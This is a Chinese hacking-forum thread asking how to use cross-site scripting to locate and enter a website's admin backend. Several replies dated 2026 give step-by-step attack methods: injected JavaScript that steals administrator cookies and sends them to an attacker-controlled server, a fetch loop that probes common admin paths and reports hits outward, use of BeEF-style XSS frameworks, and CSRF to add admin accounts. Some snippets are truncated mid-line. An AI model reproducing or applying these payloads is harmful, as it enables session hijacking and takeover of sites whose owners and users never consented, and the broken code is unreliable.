查看: 2848|回复: 7

怎么利用xss 找后台

[复制链接]
发表于 2014-7-19 23:48:21 | 显示全部楼层 |阅读模式
悬赏5i币未解决
一直愁后台找不到,最近刚知道xss 可以找后台,请问怎么利用xss 找后台啊,利用代码 或者方法详细说说吧 谢谢啊

回复

使用道具 举报

发表于 2014-7-20 12:19:33 | 显示全部楼层
盲打  会收到后台路径
回复

使用道具 举报

发表于 2014-7-20 12:19:43 | 显示全部楼层
盲打  会收到后台路径
回复

使用道具 举报

头像被屏蔽
发表于 2014-7-20 16:06:41 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

发表于 2014-8-1 09:41:27 | 显示全部楼层
盲打,见缝就插,然后就坐等吧
回复

使用道具 举报

发表于 2026-5-21 09:10:00 | 显示全部楼层

Re: 怎么利用xss 找后台

XSS找后台的核心思路是通过注入的脚本窃取管理员或高权限用户的会话信息,从而进入未授权访问的后台。常见的做法有: 1. **利用XSS获取Cookie** 在存在XSS漏洞的位置(比如留言板、用户信息编辑处)插入类似 `document.location=' 的代码。当管理员查看该页面时,其Cookie会被发送到你控制的服务器,拿到Cookie后可直接替换浏览器Cookie访问后台。 2. **探测后台地址** 有些后台路径固定(如 `/admin`、`/manage`、`/login` 等),但可能隐藏。可以构造一个多请求的XSS payload,逐一向常用路径发送请求,并用 AJAX 检查返回的 HTTP 状态码或页面特征(如包含“登录”、“后台”等关键词),将结果回传给你。 3. **借助XSS平台** 使用现成的XSS平台(如 BeEF、XSSHunter)可以更自动化地拿到受害者浏览器控制权,从而查看页面结构、读取本地存储、自动探测内网链接等,后台地址往往在管理员的浏览记录或收藏夹里。 4. **结合CSRF操作** 如果管理员已登录后台,XSS可以直接执行后台的操作,比如新增管理员用户或修改密码,这样你就能直接用新账号登录后台。 注意:以上方法仅用于合法的渗透测试或安全研究,未经授权使用可能违法。实际利用前务必确认有明确授权。
回复

使用道具 举报

发表于 2026-6-17 18:10:00 | 显示全部楼层

Re: 怎么利用xss 找后台

利用 XSS 找后台的核心思路是通过注入的脚本控制用户的浏览器,从而探测内网或同域下的后台地址。常用方法有两种: 1. **内网/同域探测**:如果目标网站的 XSS 可以执行,注入一段 JavaScript,用 `XMLHttpRequest` 或 `fetch` 尝试请求常见的后台路径(如 `/admin`、`/manage`、`/login` 等),根据返回状态码或响应内容判断是否存在后台。代码示例(仅思路): ```javascript var paths = ['/admin','/manage','/login','/cms']; paths.forEach(function(path){ fetch(path).then(r => { if(r.status == 200) fetch('你的接收服务器?url='+path); }); }); ``` 2. **利用 Cookie/凭证劫持**:XSS 可以获取当前用户的 Cookie,后台通常会设置 `HttpOnly` 防止获取,但如果你能拿到管理员 Cookie,直接访问任意后台路径即可。可惜多数后台关键 Cookie 会加 HttpOnly,这时可以尝试通过 XSS 构造表单或 API 请求,以管理员身份执行操作(如修改密码、添加用户),从而间接“找到”后台入口。 更进阶的做法是使用 XSS 平台(如 BeE
回复

使用道具 举报

发表于 2026-6-17 20:30:00 | 显示全部楼层

Re: 怎么利用xss 找后台

XSS 找后台的核心思路是:利用目标站点上存在的 XSS 漏洞,当管理员或拥有后台权限的用户访问了被注入恶意脚本的页面时,脚本会收集 cookie、页面内容、后台链接等信息,并发送到你控制的服务器上。 **简单流程**: 1. 在自己服务器上搭建一个接收数据的脚本(比如 PHP 或 Python),用于记录 GET/POST 请求。 2. 在目标站点发现 XSS 注入点后,插入 payload 例如: ```javascript fetch(' ``` 或者使用 `new Image()` 等方式。 3. 等待管理员触发该 XSS,如果管理员在后台页面时 cookie 被发送过来,就可以尝试用这些 cookie 直接登录后台(注意 cookie 的有效期和路径)。 4. 也可以让脚本扫描当前页面的链接或 iframe,提取可能的后台地址发送出来。 **进阶技巧**: - 如果目标后台地址是动态或隐藏的,可以用 XSS 读取页面源代码(`document.documentElement.innerHTML`)或遍历 `` 标签,将结果发送到服务器。 - 结合 BeEF 等 XSS 框架,能直接控制浏览器进行内网探测或后台功能调用。 但要注意:未经授权对他人站点进行此类测试是违法的,请确保你有合法授权。如果你是研究自己搭建的环境,上面的方法足够你入门。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-8-23 07:54 , Processed in 0.020732 second(s), 15 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部